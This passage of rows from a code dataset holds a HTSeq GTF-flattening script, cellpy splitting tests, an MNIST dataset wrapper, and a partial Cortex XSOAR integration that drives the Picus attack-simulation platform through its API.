   sys.stderr.write( "Usage: python %s <in.gtf> <out.gff>\n\n" % os.path.basename(sys.argv[0]) )
   sys.stderr.write( "This script takes an annotation file in Ensembl GTF format\n" )
   sys.stderr.write( "and outputs a 'flattened' annotation file suitable for use\n" )
   sys.stderr.write( "with the count_in_exons.py script.\n" )
   sys.exit(1)
# HTSeq is imported lazily so that a helpful message can be printed if missing.
try:
   import HTSeq
except ImportError:
   sys.stderr.write( "Could not import HTSeq. Please install the HTSeq Python framework\n" )
   sys.stderr.write( "available from http://www-huber.embl.de/users/anders/HTSeq\n" )
   sys.exit(1)
gtf_file = args[0]
out_file = args[1]
aggregateGenes = opts.aggregate == "yes"
# Step 1: Store all exons with their gene and transcript ID
# in a GenomicArrayOfSets
exons = HTSeq.GenomicArrayOfSets( "auto", stranded=True )
for f in HTSeq.GFF_Reader( gtf_file ):
   if f.type != "exon":
      continue
   # NOTE(review): gene IDs are sanitized (':' -> '_'); presumably to keep the
   # '+'-joined aggregate IDs below parseable downstream -- confirm.
   f.attr['gene_id'] = f.attr['gene_id'].replace( ":", "_" )
   exons[f.iv] += ( f.attr['gene_id'], f.attr['transcript_id'] )
# Step 2: Form sets of overlapping genes
# We produce the dict 'gene_sets', whose values are sets of gene IDs. Each set
# contains IDs of genes that overlap, i.e., share bases (on the same strand).
# The keys of 'gene_sets' are the IDs of all genes, and each key refers to
# the set that contains the gene.
# Each gene set forms an 'aggregate gene'.
if aggregateGenes == True:
   gene_sets = collections.defaultdict( lambda: set() )
   for iv, s in exons.steps():
      # For each step, make a set, 'full_set' of all the gene IDs occuring
      # in the present step, and also add all those gene IDs, whch have been
      # seen earlier to co-occur with each of the currently present gene IDs.
      full_set = set()
      for gene_id, transcript_id in s:
         full_set.add( gene_id )
         full_set |= gene_sets[ gene_id ]
      # Make sure that all genes that are now in full_set get associated
      # with full_set, i.e., get to know about their new partners
      for gene_id in full_set:
         assert gene_sets[ gene_id ] <= full_set
         gene_sets[ gene_id ] = full_set
# Step 3: Go through the steps again to get the exonic sections. Each step
# becomes an 'exonic part'. The exonic part is associated with an
# aggregate gene, i.e., a gene set as determined in the previous step,
# and a transcript set, containing all transcripts that occur in the step.
# The results are stored in the dict 'aggregates', which contains, for each
# aggregate ID, a list of all its exonic_part features.
aggregates = collections.defaultdict( lambda: list() )
for iv, s in exons.steps( ):
   # Skip empty steps
   if len(s) == 0:
      continue
   gene_id = list(s)[0][0]
   ## if aggregateGenes=FALSE, ignore the exons associated to more than one gene ID
   if aggregateGenes == False:
      check_set = set()
      for geneID, transcript_id in s:
         check_set.add( geneID )
      if( len( check_set ) > 1 ):
         continue
      else:
         aggregate_id = gene_id
   # Take one of the gene IDs, find the others via gene sets, and
   # form the aggregate ID from all of them
   else:
      assert set( gene_id for gene_id, transcript_id in s ) <= gene_sets[ gene_id ]
      aggregate_id = '+'.join( gene_sets[ gene_id ] )
   # Make the feature and store it in 'aggregates'
   f = HTSeq.GenomicFeature( aggregate_id, "exonic_part", iv )
   f.source = os.path.basename( sys.argv[0] )
   # f.source = "camara"
   f.attr = {}
   f.attr[ 'gene_id' ] = aggregate_id
   transcript_set = set( ( transcript_id for gene_id, transcript_id in s ) )
   f.attr[ 'transcripts' ] = '+'.join( transcript_set )
   aggregates[ aggregate_id ].append( f )
# Step 4: For each aggregate, number the exonic parts
aggregate_features = []
for l in aggregates.values():
   # Sanity checks: all parts of an aggregate must share name, chromosome and
   # strand, and must already be in ascending coordinate order.
   for i in xrange( len(l)-1 ):
      assert l[i].name == l[i+1].name, str(l[i+1]) + " has wrong name"
      assert l[i].iv.end <= l[i+1].iv.start, str(l[i+1]) + " starts too early"
      if l[i].iv.chrom != l[i+1].iv.chrom:
         raise ValueError, "Same name found on two chromosomes: %s, %s" % ( str(l[i]), str(l[i+1]) )
      if l[i].iv.strand != l[i+1].iv.strand:
         raise ValueError, "Same name found on two strands: %s, %s" % ( str(l[i]), str(l[i+1]) )
   aggr_feat = HTSeq.GenomicFeature( l[0].name, "aggregate_gene",
      HTSeq.GenomicInterval( l[0].iv.chrom, l[0].iv.start,
      l[-1].iv.end, l[0].iv.strand ) )
   aggr_feat.source = os.path.basename( sys.argv[0] )
   aggr_feat.attr = { 'gene_id': aggr_feat.name }
   # Number the exonic parts 001, 002, ... within each aggregate gene.
   for i in xrange( len(l) ):
      l[i].attr['exonic_part_number'] = "%03d" % ( i+1 )
   aggregate_features.append( aggr_feat )
# Step 5: Sort the aggregates, then write everything out
aggregate_features.sort( key = lambda f: ( f.iv.chrom, f.iv.start ) )
fout = open( out_file, "w" )
for aggr_feat in aggregate_features:
   fout.write( aggr_feat.get_gff_line() )
   for f in aggregates[ aggr_feat.name ]:
      fout.write( f.get_gff_line() )
fout.close()
| 0 | 0 | 0 |
27ecd7e0de97aba995ab11f8a9a66fb7b971baaa | 1,113 | py | Python | tests/test_cellpy_splitting.py | streamengineer/cellpy | 59a83065297ce0ba370fc11181085c98f587101e | [
"MIT"
] | 38 | 2016-08-16T10:54:56.000Z | 2022-03-03T04:43:20.000Z | tests/test_cellpy_splitting.py | Ozzstein/cellpy | ee532905741db4cb928303d75426d2a4fa77144a | [
"MIT"
] | 88 | 2016-08-16T13:10:27.000Z | 2022-03-29T10:36:39.000Z | tests/test_cellpy_splitting.py | Ozzstein/cellpy | ee532905741db4cb928303d75426d2a4fa77144a | [
"MIT"
] | 13 | 2019-01-02T03:57:52.000Z | 2022-01-19T08:06:49.000Z | import pytest
import logging
import pandas as pd
from cellpy import log
from cellpy.utils import helpers
from . import fdv
from cellpy.exceptions import NullData
log.setup_logging(default_level=logging.DEBUG)
@pytest.fixture
| 24.733333 | 65 | 0.734951 | import pytest
import logging
import pandas as pd
from cellpy import log
from cellpy.utils import helpers
from . import fdv
from cellpy.exceptions import NullData
log.setup_logging(default_level=logging.DEBUG)
@pytest.fixture
def cell():
    """Return a CellpyData instance loaded from the shared test cellpy file."""
    from cellpy import cellreader

    cellpy_data = cellreader.CellpyData()
    cellpy_data.load(fdv.cellpy_file_path)
    return cellpy_data
def test_split(cell):
    """Splitting at cycle 10 keeps cycles 1-9 in the first part and the rest in the second."""
    all_cycles = cell.get_cycle_numbers()
    first_part, last_part = cell.split(10)
    first_cycles = first_part.get_cycle_numbers()
    last_cycles = last_part.get_cycle_numbers()
    assert first_cycles[0] == 1
    assert first_cycles[-1] == 9
    assert all_cycles[-1] == last_cycles[-1]
def test_drop_to(cell):
    """Dropping everything before cycle 10 leaves cycles 10..last."""
    remaining = cell.drop_to(10)
    remaining_cycles = remaining.get_cycle_numbers()
    print(remaining_cycles)
    assert remaining_cycles[0] == 10
    assert remaining_cycles[-1] == cell.get_cycle_numbers()[-1]
def test_drop_from(cell):
    """Dropping cycle 10 and onwards leaves cycles 1-9."""
    remaining = cell.drop_from(10)
    remaining_cycles = remaining.get_cycle_numbers()
    assert remaining_cycles[0] == 1
    assert remaining_cycles[-1] == 9
| 790 | 0 | 91 |
3e870086f0ff1e47525d5374a87b55c8fe35f165 | 999 | py | Python | tensorclan/dataset/zoo/mnist_dataset.py | extensive-vision-ai/TheTensorClan | 54b50fcb8f309909478547f37f171d022a838167 | [
"MIT"
] | null | null | null | tensorclan/dataset/zoo/mnist_dataset.py | extensive-vision-ai/TheTensorClan | 54b50fcb8f309909478547f37f171d022a838167 | [
"MIT"
] | 11 | 2020-07-31T02:26:29.000Z | 2022-02-08T18:59:59.000Z | tensorclan/dataset/zoo/mnist_dataset.py | extensive-vision-ai/TheTensorClan | 54b50fcb8f309909478547f37f171d022a838167 | [
"MIT"
] | 1 | 2020-11-24T17:02:54.000Z | 2020-11-24T17:02:54.000Z | from tensorclan.dataset import BaseDataset
from tensorclan.dataset.transform import BaseTransform
from torchvision import datasets
from torch.utils.data import Subset
| 26.289474 | 117 | 0.656657 | from tensorclan.dataset import BaseDataset
from tensorclan.dataset.transform import BaseTransform
from torchvision import datasets
from torch.utils.data import Subset
class MNIST(BaseDataset):
    """MNIST dataset wrapper: downloads torchvision MNIST and exposes
    train/test splits wrapped in torch Subsets."""

    # populated from split_dataset(); bare annotations only
    test_set: datasets.MNIST
    train_set: datasets.MNIST

    def __init__(self, root: str, transforms=None):
        """Store the data directory and the transform factory."""
        self.data_dir = root
        self.transforms = transforms

    @staticmethod
    def split_dataset(dataset, transforms):
        """Build (train, test) torchvision MNIST datasets (downloading if
        needed) and return each wrapped in a full-range Subset."""
        splits = []
        for is_train in (True, False):
            mnist_split = datasets.MNIST(
                dataset.data_dir,
                train=is_train,
                download=True,
                transform=transforms.build_transforms(train=is_train),
            )
            splits.append(Subset(mnist_split, indices=range(0, len(mnist_split))))
        return tuple(splits)

    @staticmethod
    def plot_sample(sample):
        """Intentionally a no-op in this implementation."""
        pass
| 626 | 180 | 23 |
3f6b57622ccefb99cae3443a0c6e9eecfad38404 | 25,822 | py | Python | Packs/PicusAutomation/Integrations/Picus/Picus.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 799 | 2016-08-02T06:43:14.000Z | 2022-03-31T11:10:11.000Z | Packs/PicusAutomation/Integrations/Picus/Picus.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 9,317 | 2016-08-07T19:00:51.000Z | 2022-03-31T21:56:04.000Z | Packs/PicusAutomation/Integrations/Picus/Picus.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 1,297 | 2016-08-04T13:59:00.000Z | 2022-03-31T23:43:06.000Z | import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
import requests
import json
import traceback
from datetime import datetime, timedelta
import time
# Disable insecure warnings
requests.packages.urllib3.disable_warnings() # pylint: disable=no-member
# flake8: noqa
''' CONSTANTS '''
DATE_FORMAT = '%Y-%m-%dT%H:%M:%SZ' # ISO8601 format with UTC, default in XSOAR
VALID_VARIANTS = ["HTTP","HTTPS"]
verify_certificate = not demisto.params().get('insecure', False)
def test_module() -> str:
    """Tests API connectivity and authentication.

    Returning 'ok' indicates that the integration works like it is supposed to.
    Connection to the service is successful.
    Raises exceptions if something goes wrong.

    :return: 'ok' if test passed, anything else will fail the test.
    :rtype: ``str``
    """
    message: str = ''
    # Pre-initialize: the except-branch below inspects this name, and it would
    # otherwise be unbound (NameError) when the request itself raises before
    # the token is assigned.
    picus_accessToken = None
    try:
        picus_server = str(demisto.params().get("picus_server"))
        # normalize the configured URL so endpoint paths can be appended verbatim
        picus_server = picus_server[:-1] if picus_server.endswith("/") else picus_server
        picus_apikey = demisto.params().get("picus_apikey")
        picus_headers = {"X-Refresh-Token": "", "Content-Type": "application/json"}
        picus_headers["X-Refresh-Token"] = "Bearer " + str(picus_apikey)
        picus_auth_endpoint = "/authenticator/v1/access-tokens/generate"
        picus_req_url = str(picus_server) + picus_auth_endpoint
        picus_session = requests.Session()
        if not demisto.params().get('proxy', False):
            # ignore environment proxy variables when the proxy option is off
            picus_session.trust_env = False
        picus_auth_response = picus_session.post(picus_req_url, headers=picus_headers, verify=verify_certificate)
        picus_auth_response.raise_for_status()
        picus_accessToken = json.loads(picus_auth_response.text)["data"]["access_token"]
        message = 'ok'
    except Exception as e:
        if 'Forbidden' in str(e) or 'Authorization' in str(e) or 'NewConnectionError' in str(e) or 'Unauthorized' in str(e) or picus_accessToken is None:
            message = 'Authorization Error: make sure API Key or Picus URL is correctly set'
        else:
            raise e
    return message
''' MAIN FUNCTION '''
def main() -> None:
    """main function, parses params and runs command functions

    Dispatches the incoming XSOAR command to its Picus handler and pushes the
    handler's result to the war room via return_results().

    :return:
    :rtype:
    """
    demisto.debug(f'Command being called is {demisto.command()}')
    # Map each XSOAR command name to its implementation.  'test-module' is the
    # call made when pressing the integration Test button.
    handlers = {
        'test-module': test_module,
        'picus-get-access-token': getAccessToken,
        'picus-get-vector-list': getVectorList,
        'picus-get-peer-list': getPeerList,
        'picus-get-attack-results': getAttackResults,
        'picus-run-attacks': runAttacks,
        'picus-get-threat-results': getThreatResults,
        'picus-set-paramPB': setParamPB,
        'picus-filter-insecure-attacks': filterInsecureAttacks,
        'picus-get-mitigation-list': getMitigationList,
        'picus-get-vector-compare': getVectorCompare,
        'picus-version': getPicusVersion,
        'picus-trigger-update': triggerUpdate,
    }
    try:
        handler = handlers.get(demisto.command())
        if handler is not None:
            result = handler()
            return_results(result)
    # Log exceptions and return errors
    except Exception as e:
        demisto.error(traceback.format_exc())  # print the traceback
        return_error(f'Failed to execute {demisto.command()} command.\nError:\n{str(e)}')
''' ENTRY POINT '''
# Run main() when executed as a script; '__builtin__'/'builtins' cover the
# case where the engine executes this module via exec() -- presumably the
# XSOAR runtime, as is conventional for integrations.
if __name__ in ('__main__', '__builtin__', 'builtins'):
    main()
| 47.818519 | 231 | 0.70804 | import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
import requests
import json
import traceback
from datetime import datetime, timedelta
import time
# Disable insecure warnings
requests.packages.urllib3.disable_warnings() # pylint: disable=no-member
# flake8: noqa
''' CONSTANTS '''
DATE_FORMAT = '%Y-%m-%dT%H:%M:%SZ' # ISO8601 format with UTC, default in XSOAR
VALID_VARIANTS = ["HTTP","HTTPS"]
verify_certificate = not demisto.params().get('insecure', False)
def test_module() -> str:
    """Tests API connectivity and authentication.

    Returning 'ok' indicates that the integration works like it is supposed to.
    Connection to the service is successful.
    Raises exceptions if something goes wrong.

    :return: 'ok' if test passed, anything else will fail the test.
    :rtype: ``str``
    """
    message: str = ''
    # Pre-initialize: the except-branch below inspects this name, and it would
    # otherwise be unbound (NameError) when the request itself raises before
    # the token is assigned.
    picus_accessToken = None
    try:
        picus_server = str(demisto.params().get("picus_server"))
        # normalize the configured URL so endpoint paths can be appended verbatim
        picus_server = picus_server[:-1] if picus_server.endswith("/") else picus_server
        picus_apikey = demisto.params().get("picus_apikey")
        picus_headers = {"X-Refresh-Token": "", "Content-Type": "application/json"}
        picus_headers["X-Refresh-Token"] = "Bearer " + str(picus_apikey)
        picus_auth_endpoint = "/authenticator/v1/access-tokens/generate"
        picus_req_url = str(picus_server) + picus_auth_endpoint
        picus_session = requests.Session()
        if not demisto.params().get('proxy', False):
            # ignore environment proxy variables when the proxy option is off
            picus_session.trust_env = False
        picus_auth_response = picus_session.post(picus_req_url, headers=picus_headers, verify=verify_certificate)
        picus_auth_response.raise_for_status()
        picus_accessToken = json.loads(picus_auth_response.text)["data"]["access_token"]
        message = 'ok'
    except Exception as e:
        if 'Forbidden' in str(e) or 'Authorization' in str(e) or 'NewConnectionError' in str(e) or 'Unauthorized' in str(e) or picus_accessToken is None:
            message = 'Authorization Error: make sure API Key or Picus URL is correctly set'
        else:
            raise e
    return message
def getAccessToken():
    """Exchange the configured Picus API key for a short-lived access token.

    Reads 'picus_server' and 'picus_apikey' from the integration parameters,
    POSTs to /authenticator/v1/access-tokens/generate and returns the token
    string.  Calls return_error() when the endpoint does not answer HTTP 200.
    """
    picus_server = str(demisto.params().get("picus_server"))
    # normalize the configured URL so endpoint paths can be appended verbatim
    picus_server = picus_server[:-1] if picus_server.endswith("/") else picus_server
    picus_apikey = demisto.params().get("picus_apikey")
    picus_headers = {"X-Refresh-Token": "", "Content-Type": "application/json"}
    picus_headers["X-Refresh-Token"] = "Bearer " + str(picus_apikey)
    picus_auth_endpoint = "/authenticator/v1/access-tokens/generate"
    picus_req_url = str(picus_server) + picus_auth_endpoint
    picus_session = requests.Session()
    if not demisto.params().get('proxy', False):
        # ignore environment proxy variables when the proxy option is off
        picus_session.trust_env = False
    picus_auth_response = picus_session.post(picus_req_url, headers=picus_headers, verify=verify_certificate)
    if picus_auth_response.status_code!=200:
        return_error(picus_auth_response.text)
    picus_accessToken = json.loads(picus_auth_response.text)["data"]["access_token"]
    return picus_accessToken
def getVectorList():
    """List the Picus vectors and return them as CommandResults.

    Optional command arguments: 'add_user_details' (truthy flag), 'page' and
    'size' for pagination; assign_params() drops the None-valued keys before
    the request.  Context output path: Picus.vectorlist.
    """
    picus_endpoint = "/user-api/v1/vectors/list"
    picus_req_url, picus_headers = generateEndpointURL(getAccessToken(),picus_endpoint)
    add_user_details = demisto.args().get('add_user_details')
    # keep None (absent argument) as-is; coerce anything else to bool
    add_user_details = bool(add_user_details) if add_user_details is not None else add_user_details
    page = arg_to_number(demisto.args().get('page'))
    size = arg_to_number(demisto.args().get('size'))
    picus_post_data = {"add_user_details":add_user_details,"size":size,"page":page}
    picus_post_data = assign_params(**picus_post_data)
    picus_endpoint_response = requests.post(picus_req_url,headers=picus_headers,data=json.dumps(picus_post_data),verify=verify_certificate)
    picus_vectors = json.loads(picus_endpoint_response.text)["data"]["vectors"]
    table_name = "Picus Vector List"
    table_headers = ['name','description','trusted','untrusted','is_disabled','type']
    md_table = tableToMarkdown(table_name,picus_vectors,headers=table_headers,removeNull=True,headerTransform=string_to_table_header)
    results = CommandResults(readable_output=md_table,outputs=picus_vectors,outputs_prefix="Picus.vectorlist")
    return results
def getPeerList():
    """Fetch the Picus peer list and return it as CommandResults
    (context path Picus.peerlist, rendered as a markdown table)."""
    endpoint = "/user-api/v1/peers/list"
    req_url, headers = generateEndpointURL(getAccessToken(), endpoint)
    response = requests.post(req_url, headers=headers, verify=verify_certificate)
    peers = json.loads(response.text)["data"]["peers"]
    md_table = tableToMarkdown(
        "Picus Peer List",
        peers,
        headers=['name', 'registered_ip', 'type', 'is_alive'],
        removeNull=True,
        headerTransform=string_to_table_header,
    )
    return CommandResults(readable_output=md_table, outputs=peers, outputs_prefix="Picus.peerlist")
def getAttackResults():
    """Collect the latest attack results for a vector over the last N days.

    Arguments: 'attacker_peer', 'victim_peer', 'days' and 'result'
    (secure/insecure/all, case-insensitive).  Queries the secure and insecure
    result lists, de-duplicates per threat_id keeping the most recent entry,
    filters by the requested result type, and returns CommandResults under
    Picus.attackresults together with a comma-joined 'threat_ids' string.
    Returns a plain error string when 'result' is invalid.
    """
    picus_endpoint = "/user-api/v1/attack-results/list"
    picus_req_url, picus_headers = generateEndpointURL(getAccessToken(), picus_endpoint)
    picus_attack_results : List[Any] = []
    picus_attack_raw_results: Dict[str,Any] = {"results":[]}
    tmp_secure_list: List[Any] = []
    tmp_insecure_list: List[Any] = []
    tmp_results: List[Any] = []
    threat_ids = ""
    attacker_peer = demisto.args().get('attacker_peer')
    victim_peer = demisto.args().get('victim_peer')
    days = int(demisto.args().get('days'))
    # normalize to 'Secure'/'Insecure'/'All' regardless of input casing
    attack_result = demisto.args().get('result').lower()
    attack_result = attack_result[0].upper() + attack_result[1:]
    valid_attack_results = ["Insecure","Secure","All"]
    check_valid = any(result for result in valid_attack_results if(result==attack_result))
    if not check_valid:
        msg = "Wrong result parameter. The result parameter can only be secure,insecure and all"
        return msg
    end_date = datetime.now().strftime("%Y-%m-%d")
    begin_date = (datetime.now() - timedelta(days=days)).strftime("%Y-%m-%d")
    picus_post_data_secure = {"attack_result":"secure","begin_date":begin_date,"end_date":end_date,"vectors":[{"trusted":victim_peer,"untrusted":attacker_peer}]}
    picus_post_data_insecure = {"attack_result":"insecure","begin_date":begin_date,"end_date":end_date,"vectors":[{"trusted":victim_peer,"untrusted":attacker_peer}]}
    picus_endpoint_response_secure = requests.post(picus_req_url,headers=picus_headers,data=json.dumps(picus_post_data_secure),verify=verify_certificate)
    picus_endpoint_response_insecure = requests.post(picus_req_url,headers=picus_headers,data=json.dumps(picus_post_data_insecure),verify=verify_certificate)
    picus_attack_results_secure = json.loads(picus_endpoint_response_secure.text)["data"]["results"]
    picus_attack_results_insecure = json.loads(picus_endpoint_response_insecure.text)["data"]["results"]
    # De-duplicate the secure results per threat_id; sorting newest-first means
    # the first occurrence kept is the most recent one.
    if picus_attack_results_secure is not None:
        picus_attack_results_secure.sort(key=returnListTimeKey,reverse=True)
        for i in range(len(picus_attack_results_secure)):
            exists = 0
            list_len = len(tmp_secure_list)
            for j in range(list_len):
                if picus_attack_results_secure[i]["threat_id"] == tmp_secure_list[j]["threat_id"]:
                    exists = 1
            if exists == 0:
                tmp_secure_list.append(picus_attack_results_secure[i])
    # Same de-duplication for the insecure results.
    if picus_attack_results_insecure is not None:
        picus_attack_results_insecure.sort(key=returnListTimeKey, reverse=True)
        for i in range(len(picus_attack_results_insecure)):
            exists = 0
            list_len = len(tmp_insecure_list)
            for j in range(list_len):
                if picus_attack_results_insecure[i]["threat_id"] == tmp_insecure_list[j]["threat_id"]:
                    exists = 1
            if exists == 0:
                tmp_insecure_list.append(picus_attack_results_insecure[i])
    tmp_results = tmp_secure_list + tmp_insecure_list
    if len(tmp_results)!=0:
        tmp_results.sort(key=returnListTimeKey, reverse=True)
    else:
        message = "No Results Data."
        results = CommandResults(readable_output=message)
        return results
    # Merge the two lists, again keeping only the newest entry per threat_id.
    for i in range(len(tmp_results)):
        exists = 0
        list_len = len(picus_attack_results)
        for j in range(list_len):
            if tmp_results[i]["threat_id"] == picus_attack_results[j]["threat_id"]:
                exists = 1
        if exists == 0:
            picus_attack_results.append(tmp_results[i])
    # Filter by the requested result type ('string' holds Secure/Insecure).
    tmp_results = []
    for i in range(len(picus_attack_results)):
        if attack_result == "All":
            tmp_results.append(picus_attack_results[i])
        elif picus_attack_results[i]["string"] == attack_result:
            tmp_results.append(picus_attack_results[i])
    picus_attack_results = tmp_results
    for i in range(len(picus_attack_results)):
        threat_ids += str(picus_attack_results[i]["threat_id"]) + ","
    threat_ids = threat_ids[:-1]
    picus_attack_raw_results["results"].append({"threat_ids":threat_ids})
    picus_attack_raw_results["results"].append(picus_attack_results)
    table_name = attack_result + " Attack List"
    table_headers = ['begin_time','end_time','string','threat_id','threat_name']
    md_table = tableToMarkdown(table_name,picus_attack_results,headers=table_headers,removeNull=True,headerTransform=string_to_table_header)
    results = CommandResults(readable_output=md_table,outputs_prefix="Picus.attackresults",outputs=picus_attack_raw_results,outputs_key_field="results.threat_id")
    return results
def runAttacks():
    """Schedule a single attack per given threat ID on the chosen vector.

    Arguments: comma-separated 'threat_ids', 'attacker_peer', 'victim_peer'
    and 'variant' (validated against VALID_VARIANTS via return_error).
    Per-threat failures are recorded as 'unknown error' instead of aborting.
    Context output (Picus.runattacks) is the comma-joined list of threat IDs
    whose scheduling returned 'success'.
    """
    picus_endpoint = "/user-api/v1/schedule/attack/single"
    picus_req_url, picus_headers = generateEndpointURL(getAccessToken(), picus_endpoint)
    picus_attack_results : Dict[str,Any] = {"results": []}
    picus_attack_raw_results = ""
    threat_ids = demisto.args().get('threat_ids')
    attacker_peer = demisto.args().get('attacker_peer')
    victim_peer = demisto.args().get('victim_peer')
    variant = demisto.args().get('variant')
    if variant not in VALID_VARIANTS:
        return_error("Unknown variant type - "+variant)
    threat_ids = list(threat_ids.split(","))
    t_count = 0
    for threat_id in threat_ids:
        try:
            threat_id = int(threat_id)
            picus_attack_data = {"trusted": victim_peer,"untrusted": attacker_peer,"threat_id": threat_id,"variant": variant}
            picus_attack_response = requests.post(picus_req_url,headers=picus_headers,data=json.dumps(picus_attack_data),verify=verify_certificate)
            attack_result_response = json.loads(picus_attack_response.text)["data"]["result"]
            picus_attack_result = {"threat_id":threat_id,"result":attack_result_response}
            picus_attack_results["results"].append(picus_attack_result)
            if attack_result_response == "success":
                picus_attack_raw_results += str(threat_id)+","
            # throttle: pause one second after every fourth request
            if t_count == 3:
                time.sleep(1)
                t_count = 0
            else:
                t_count+=1
        except Exception as e:
            picus_attack_result = {"threat_id":threat_id,"result":"unknown error"}
            picus_attack_results["results"].append(picus_attack_result)
            continue
    # drop the trailing comma from the success-id string
    if len(picus_attack_raw_results)!=0:
        picus_attack_raw_results = picus_attack_raw_results[:-1]
    picus_attack_results = picus_attack_results["results"]
    table_name = "Picus Attack Results"
    table_headers = ['threat_id','result']
    md_table = tableToMarkdown(table_name, picus_attack_results, headers=table_headers, removeNull=True,headerTransform=string_to_table_header)
    results = CommandResults(readable_output=md_table,outputs_prefix="Picus.runattacks",outputs=picus_attack_raw_results)
    return results
def getThreatResults():
    """Fetch the latest per-threat result for one vector/variant combination.

    Arguments: comma-separated 'threat_ids', 'attacker_peer', 'victim_peer'
    and 'variant' (validated against VALID_VARIANTS).  For each threat the
    matching vector ("<attacker> - <victim>") and variant entry is extracted;
    per-threat failures are recorded with status 'fail'.  The context output
    (Picus.threatresults) carries both the result dicts and a
    '<id>=<result>' comma-joined summary string.
    """
    picus_endpoint = "/user-api/v1/attack-results/threat-specific-latest"
    picus_req_url, picus_headers = generateEndpointURL(getAccessToken(), picus_endpoint)
    picus_threat_results : Dict[str,Any] = {"results":[]}
    picus_threat_raw_results = ""
    threat_raw_output: Dict[str,Any] = {"results":[]}
    threat_ids = demisto.args().get('threat_ids')
    attacker_peer = demisto.args().get('attacker_peer')
    victim_peer = demisto.args().get('victim_peer')
    variant = demisto.args().get('variant')
    if variant not in VALID_VARIANTS:
        return_error("Unknown variant type - "+variant)
    threat_ids = list(threat_ids.split(","))
    for threat_id in threat_ids:
        try:
            threat_id = int(threat_id)
            picus_threat_data = {"threat_id": threat_id}
            picus_threat_response = requests.post(picus_req_url,headers=picus_headers,data=json.dumps(picus_threat_data),verify=verify_certificate)
            picus_threat_json_result = json.loads(picus_threat_response.text)["data"]["results"]
            l1_category = picus_threat_json_result["l1_category_name"]
            # vector names in the API response are "<attacker> - <victim>"
            vector_name = attacker_peer + " - " + victim_peer
            vectors_results = picus_threat_json_result["vectors"]
            for i in range(len(vectors_results)):
                if vectors_results[i]["name"] == vector_name:
                    variants_results = vectors_results[i]["variants"]
                    for j in range(len(variants_results)):
                        if variants_results[j]["name"] == variant:
                            last_time = variants_results[j]["last_time"]
                            threat_result = variants_results[j]["result"]
                            picus_threat_result = {"l1_category":l1_category,"result":threat_result,"threat_id":threat_id,"last_time":last_time,"status":"success"}
                            picus_threat_results["results"].append(picus_threat_result)
                            picus_threat_raw_results += str(threat_id) + "=" + threat_result + ","
        except Exception as e:
            picus_threat_result = {"l1_category": "null","result": "null","threat_id": threat_id,"last_time": "null","status": "fail"}
            picus_threat_results["results"].append(picus_threat_result)
            continue
    # drop the trailing comma from the summary string
    if len(picus_threat_raw_results)!=0:
        picus_threat_raw_results = picus_threat_raw_results[:-1]
    picus_threat_results = picus_threat_results["results"]
    threat_raw_output["results"].append({"threat_results":picus_threat_raw_results})
    threat_raw_output["results"].append(picus_threat_results)
    table_name = "Picus Threat Results"
    table_headers = ['threat_id','result','l1_category','last_time','status']
    md_table = tableToMarkdown(table_name, picus_threat_results, headers=table_headers, removeNull=True,headerTransform=string_to_table_header)
    results = CommandResults(readable_output=md_table,outputs_prefix="Picus.threatresults",outputs=threat_raw_output,outputs_key_field="results.threat_id")
    return results
def filterInsecureAttacks():
    """Keep only the threat IDs whose result entry contains 'Insecure'.

    Reads the comma-separated 'threatinfo' argument (entries shaped like
    '<threat_id>=<result>') and returns the matching IDs as a comma-joined
    string under the Picus.filterinsecure context path.
    """
    threatinfo = demisto.args().get('threatinfo')
    insecure_entries = [entry for entry in threatinfo.split(",") if "Insecure" in entry]
    # each entry looks like "<id>=<result>"; keep only the id part
    threat_ids = ",".join(entry.split("=")[0] for entry in insecure_entries)
    results = CommandResults(readable_output=threat_ids, outputs_prefix="Picus.filterinsecure", outputs=threat_ids)
    return results
def getMitigationList():
    """List mitigation signatures for the given threats and products.

    Arguments: comma-separated 'threat_ids' and 'product' (vendor list).
    Per-threat request failures are silently skipped (best-effort).  Returns
    CommandResults under Picus.mitigationresults keyed by signature_id.
    """
    picus_endpoint = "/user-api/v1/threats/mitigations/list"
    picus_req_url, picus_headers = generateEndpointURL(getAccessToken(), picus_endpoint)
    picus_mitigation_results : Dict[str,Any] = {"results": []}
    threat_ids = demisto.args().get('threat_ids')
    product = demisto.args().get('product')
    product = list(product.split(","))
    threat_ids = list(threat_ids.split(","))
    for threat_id in threat_ids:
        try:
            threat_id = int(threat_id)
            picus_threat_data = {"threat_id":threat_id,"products":product}
            picus_mitigation_response = requests.post(picus_req_url,headers=picus_headers,data=json.dumps(picus_threat_data),verify=verify_certificate)
            picus_mitigation_result = json.loads(picus_mitigation_response.text)["data"]["mitigations"]
            picus_mitigation_count = json.loads(picus_mitigation_response.text)["data"]["total_count"]
            if picus_mitigation_count!=0:
                # flatten nested threat/signature/product fields into one row
                for threat_mitigation in picus_mitigation_result:
                    mitigation_data = {"threat_id":threat_mitigation["threat"]["id"],"signature_id":threat_mitigation["signature"]["id"],"signature_name":threat_mitigation["signature"]["name"],"vendor":threat_mitigation["product"]}
                    picus_mitigation_results["results"].append(mitigation_data)
        except Exception as e:
            continue
    picus_mitigation_results = picus_mitigation_results["results"]
    table_name = "Picus Mitigation List"
    table_headers = ['threat_id','signature_id','signature_name','vendor']
    md_table = tableToMarkdown(table_name, picus_mitigation_results, headers=table_headers, removeNull=True,headerTransform=string_to_table_header)
    results = CommandResults(readable_output=md_table,outputs_prefix="Picus.mitigationresults",outputs=picus_mitigation_results,outputs_key_field="signature_id")
    return results
def getVectorCompare():
    """Compare a vector's results over the last N days.

    Arguments: 'attacker_peer', 'victim_peer' and 'days'.  Flattens the API's
    four buckets (secures, insecures, secure_to_insecures,
    insecure_to_secures) of the first variant into one row list; an empty
    bucket is represented by a single placeholder row with "null" fields.
    Context output path: Picus.vectorresults.
    """
    picus_endpoint = "/user-api/v1/attack-results/compare-a-vector"
    picus_req_url, picus_headers = generateEndpointURL(getAccessToken(), picus_endpoint)
    all_vector_results : Dict[str,Any] = {"results": []}
    attacker_peer = demisto.args().get('attacker_peer')
    victim_peer = demisto.args().get('victim_peer')
    days = int(demisto.args().get('days'))
    end_date = datetime.now().strftime("%Y-%m-%d")
    begin_date = (datetime.now() - timedelta(days=days)).strftime("%Y-%m-%d")
